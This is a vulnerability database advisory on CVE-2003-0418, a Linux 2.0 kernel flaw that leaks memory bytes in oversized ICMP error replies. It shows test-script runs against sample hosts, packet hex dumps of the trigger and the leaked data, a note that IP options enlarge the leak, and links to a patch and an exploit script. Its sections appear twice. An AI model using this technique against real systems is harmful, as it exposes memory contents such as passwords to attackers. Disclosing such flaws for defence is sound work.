Linux 2.0 remote info leak from too big icmp citation

2003-06-09T13:03:15
ID OSVDB:2173
Type osvdb
Reporter OSVDB
Modified 2003-06-09T13:03:15

Description

Vulnerability Description

There is a flaw in the Linux 2.0 through 2.0.39 kernel's IP stack implementation in how it handles ICMP errors. This flaw causes the machine to return too much information in the return ICMP packet including passwords.

Vulnerable products

Any 2.0 linux kernel before 2.0.39 (2.0.39 included) Watchguard Firebox II

Any appliance (firewall, proxy, etc.) that uses linux 2.0 <= 2.0.39

Vulnerable:

./icmpleaktest.py 192.168.11.2

Packet sent. Answer should take 31s. Interrupt with C-c Got 'x95x03x1ax10Jixfbxbaxd0xc5Qx14x877xbdx8a;xb3^x7f'

Not vulnerable:

./icmpleaktest.py 172.16.1.40

Packet sent. Answer should take 31s. Interrupt with C-c Got '

Vendor status

Linux 2.0.40 should be out soon. Watchguard said updated releases will follow.

These vendors said they are not vulnerable : Netscreen Symantec Novell Clavister Ingrian StoneSoft * Sun

Example

We can send an IP packet with the MF flag :

15:41:05 192.168.0.12.80 > 192.168.0.10.80: udp 4 (frag 52007:12@0+) 0x0000 4500 0020 cb27 2000 4011 0e3f c0a8 000c E....'..@..?.... 0x0010 c0a8 000a 0050 0050 000c cd1e 5858 5858 .....P.P....XXXX

we wait 30s for the reassembly to timeout :

15:41:35 192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0] 0x0000 45c0 0050 dcca 0000 4001 1bbc c0a8 000a E..P....@....... 0x0010 c0a8 000c 0b01 aa24 0000 0000 4500 0020 .......$....E... 0x0020 cb27 2000 4011 0e3f c0a8 000c c0a8 000a .'..@..?........ 0x0030 0050 0050 000c cd1e 5858 5858 .P.P....XXXX 0050 0050 .P.P 0x0040 000c cd1e 5858 5858 207b 2d68 0000 0000 ....XXXX.{-h....

Bytes at offsets 0x3c to 0x4f are bonus. It works with every ICMP errors except the port unreachable error. It is possible to increase the size of data leaked by adding IP options.

Examples of bonus bytes :

98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00 .....X..1234..U. 98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00 .........X...... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03 X............X.. 69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46 information.MINF 00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03 ..........U..... 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX.... 2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72 .0.%u.in-addr.ar 90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F C_MONETARY.LC_CO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00 ................ 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX.... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00 ....._.......... 73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E sinl..gnu.warnin 70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40 p..@`..@...@...@ 68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00 h...AF..g...AL.. FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00 ............J... 61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F age-return.SI.SO 61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F ash.zero.one.two 0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00 ................ 01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00 ....-........... 4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00 L.......M....... 01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00 ....l.......m... 4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47 LC_ALL.LC_MESSAG

Solution Description

Check with your vendor for an official update. There is an unoffical patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch

Workarounds include filtering ICMP messages and truncating ICMP error at the RFC limits.

Short Description

There is a flaw in the Linux 2.0 through 2.0.39 kernel's IP stack implementation in how it handles ICMP errors. This flaw causes the machine to return too much information in the return ICMP packet including passwords.

Vulnerable products

Any 2.0 linux kernel before 2.0.39 (2.0.39 included) Watchguard Firebox II

Any appliance (firewall, proxy, etc.) that uses linux 2.0 <= 2.0.39

Vulnerable:

./icmpleaktest.py 192.168.11.2

Packet sent. Answer should take 31s. Interrupt with C-c Got 'x95x03x1ax10Jixfbxbaxd0xc5Qx14x877xbdx8a;xb3^x7f'

Not vulnerable:

./icmpleaktest.py 172.16.1.40

Packet sent. Answer should take 31s. Interrupt with C-c Got '

Vendor status

Linux 2.0.40 should be out soon. Watchguard said updated releases will follow.

These vendors said they are not vulnerable : Netscreen Symantec Novell Clavister Ingrian StoneSoft * Sun

Example

We can send an IP packet with the MF flag :

15:41:05 192.168.0.12.80 > 192.168.0.10.80: udp 4 (frag 52007:12@0+) 0x0000 4500 0020 cb27 2000 4011 0e3f c0a8 000c E....'..@..?.... 0x0010 c0a8 000a 0050 0050 000c cd1e 5858 5858 .....P.P....XXXX

we wait 30s for the reassembly to timeout :

15:41:35 192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0] 0x0000 45c0 0050 dcca 0000 4001 1bbc c0a8 000a E..P....@....... 0x0010 c0a8 000c 0b01 aa24 0000 0000 4500 0020 .......$....E... 0x0020 cb27 2000 4011 0e3f c0a8 000c c0a8 000a .'..@..?........ 0x0030 0050 0050 000c cd1e 5858 5858 .P.P....XXXX 0050 0050 .P.P 0x0040 000c cd1e 5858 5858 207b 2d68 0000 0000 ....XXXX.{-h....

Bytes at offsets 0x3c to 0x4f are bonus. It works with every ICMP errors except the port unreachable error. It is possible to increase the size of data leaked by adding IP options.

Examples of bonus bytes :

98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00 .....X..1234..U. 98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00 .........X...... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03 X............X.. 69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46 information.MINF 00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03 ..........U..... 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX.... 2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72 .0.%u.in-addr.ar 90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F C_MONETARY.LC_CO 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00 ................ 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX.... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00 ....._.......... 73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E sinl..gnu.warnin 70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40 p..@`..@...@...@ 68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00 h...AF..g...AL.. FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00 ............J... 61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F age-return.SI.SO 61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F ash.zero.one.two 0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00 ................ 01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00 ....-........... 4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00 L.......M....... 01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00 ....l.......m... 4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47 LC_ALL.LC_MESSAG

References:

ISS X-Force ID: 12223 Generic Informational URL: http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt Generic Exploit URL: http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py CVE-2003-0418 CERT VU: 471084